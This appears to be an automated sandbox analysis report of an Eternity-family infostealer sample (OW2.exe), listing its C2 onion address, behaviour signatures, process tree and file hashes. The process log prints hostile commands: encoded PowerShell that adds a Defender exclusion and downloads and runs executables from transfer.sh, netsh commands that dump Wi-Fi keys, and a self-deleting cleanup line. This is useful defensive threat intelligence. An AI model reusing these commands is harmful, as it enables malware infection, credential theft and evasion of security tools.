Analysis
-
max time kernel
94s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
13/01/2023, 11:28
General
-
Target
OW2.exe
-
Size
3.3MB
-
MD5
c1b752726974430ac3fec2f1455827ae
-
SHA1
96ea20ec6509e82dd825744378c53b92d7ad230d
-
SHA256
d4593b5e9b2a13357e52c1776acbe24990ec4d2154564bd454f53193859dae2f
-
SHA512
acc835458d69b374e0818a42ec167d4d936f1f0d3c2527fc16226b72401353d8536a34c9b88bb8d2661dcd6f34a6a3a9e09e0243b6626bb6532113232548907a
-
SSDEEP
98304:Ul/Kl7eRkjMa71IWV7VQhDU80HhDBfRT/R:2/2SPa757u+809d
Malware Config
Extracted
eternity
http://eternityms33k74r7iuuxfda4sqsiei3o3lbtr5cpalf6f4skszpruad.onion
113d641555b94beb8fc6e666c5499b40
Signatures
-
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 5 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of WriteProcessMemory 62 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\OW2.exe"C:\Users\Admin\AppData\Local\Temp\OW2.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0AQwBvAG0AbQBhAG4AZAAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoALwBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAIAAtAEYAbwByAGMAZQAgAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:/ProgramData -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvAHQAcgBhAG4AcwBmAGUAcgAuAHMAaAAvAGcAZQB0AC8ANQBCAGMANgBMAGkALwB3AGQAdwBkAHcALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoALwBQAHIAbwBnAHIAYQBtAEQAYQB0AGEALwBEAGkAZwBpAHQAYQBsAFMAbwBmAHQALgBlAHgAZQAiACAAOwAgAGMAZAAgAEMAOgAvAFAAcgBvAGcAcgBhAG0ARABhAHQAYQAvACAAOwAgAC4ALwBEAGkAZwBpAHQAYQBsAFMAbwBmAHQALgBlAHgAZQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\DigitalSoft.exe"C:\ProgramData\DigitalSoft.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvAHQAcgBhAG4AcwBmAGUAcgAuAHMAaAAvAGcAZQB0AC8AQgB5ADIAbgBNAGoALwBwAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdAAuAGUAeABlACIAIAA7ACAAYwBkACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAIAA7ACAALgAvAHQALgBlAHgAZQAgAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\t.exe"C:\ProgramData\t.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650017⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile7⤵
-
-
C:\Windows\SysWOW64\findstr.exefindstr All7⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile name="65001" key=clear | findstr Key6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650017⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile name="65001" key=clear7⤵
-
-
C:\Windows\SysWOW64\findstr.exefindstr Key7⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650017⤵
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.17⤵
- Runs ping.exe
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
MD529afd87089337705ef3afc0c8dbe7035
SHA189eda1bc9b1432dbb60d302ac1165c429907c23e
SHA256566430ef6cfde2a55d9c27fb92168a3ed6cc3802be791215a59609567ce06711
SHA512df08ca4bd9db3455670942a919fc2df2ef7e94f1006a721660cf0c28cbe75624fa391f138aedd116a56a67b6007a33ca06b8abcb641f30656379b0af64f964e2
-
Filesize
2.9MB
MD529afd87089337705ef3afc0c8dbe7035
SHA189eda1bc9b1432dbb60d302ac1165c429907c23e
SHA256566430ef6cfde2a55d9c27fb92168a3ed6cc3802be791215a59609567ce06711
SHA512df08ca4bd9db3455670942a919fc2df2ef7e94f1006a721660cf0c28cbe75624fa391f138aedd116a56a67b6007a33ca06b8abcb641f30656379b0af64f964e2
-
Filesize
387KB
MD55b7cf0c11c0c8a93410267b3dfa650f0
SHA16e410946d5303fdd4c79ce77d35c7dbfdbb42058
SHA2566d72a7cce41fee72110f821efbb5d6784b51c0c56da5dcd3def54c413b7ff07f
SHA512a86c8978f5f2bc4ac462c7898bb258132e1b2f557763ede55a2b9f0759a05bd68c3d690e63e7324d0688129468086001df1ebdc6a041cd60c1bbb92421758668
-
Filesize
387KB
MD55b7cf0c11c0c8a93410267b3dfa650f0
SHA16e410946d5303fdd4c79ce77d35c7dbfdbb42058
SHA2566d72a7cce41fee72110f821efbb5d6784b51c0c56da5dcd3def54c413b7ff07f
SHA512a86c8978f5f2bc4ac462c7898bb258132e1b2f557763ede55a2b9f0759a05bd68c3d690e63e7324d0688129468086001df1ebdc6a041cd60c1bbb92421758668
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
11KB
MD5f073b54b73d6963e7493f524007a66ff
SHA1be1ba9a4dbb125af38a6596680bce1a3d5a4ecde
SHA2563e4566b4afa359e74b869c41da6f53caa15224f6e3caa2c8174798d954df729b
SHA512285a3a209e6f397043cd5a7a3df6bf4110a6c34915a33c7e28ba3aa1225c0fe9083e3b6c4e86b00f306a8cc41e76a3d82f5530e9d2823ee4ec0165f115d3dd3a
-
Filesize
11KB
MD5f073b54b73d6963e7493f524007a66ff
SHA1be1ba9a4dbb125af38a6596680bce1a3d5a4ecde
SHA2563e4566b4afa359e74b869c41da6f53caa15224f6e3caa2c8174798d954df729b
SHA512285a3a209e6f397043cd5a7a3df6bf4110a6c34915a33c7e28ba3aa1225c0fe9083e3b6c4e86b00f306a8cc41e76a3d82f5530e9d2823ee4ec0165f115d3dd3a
-
Filesize
17KB
MD5855323142690a304c13c505def33efeb
SHA1ec847788e71b14b30f91e6e3b544329bfb649d8e
SHA2569c4b40173d9fa11039c2b64f493b9aa905ca9edd8efe571e5cef2fa3bac0e4b4
SHA51278bd7ec7be83a920b1478224d4e10259e423ddf328609243302d729036024410a3ea365399e52c1dc49fa1ab4a926105049d93b6b3bf5ae8718ce102cf16ffff
-
Filesize
272KB
-
Filesize
216KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
472KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
120KB
-
Filesize
408KB
-
Filesize
200KB
-
Filesize
104KB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
600KB
-
Filesize
56KB
-
Filesize
32KB
-
Filesize
40KB
-
Filesize
8.5MB
-
Filesize
624KB
-
Filesize
5.6MB
-
Filesize
584KB
-
Filesize
8.5MB
-
Filesize
8.5MB
-
Filesize
8.5MB
-
Filesize
8.5MB
-
Filesize
136KB
-
Filesize
320KB
-
Filesize
360KB
-
Filesize
7.8MB
-
Filesize
240KB
-
Filesize
72KB
-
Filesize
7.8MB
-
Filesize
72KB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
40KB
-
Filesize
416KB
-
Filesize
120KB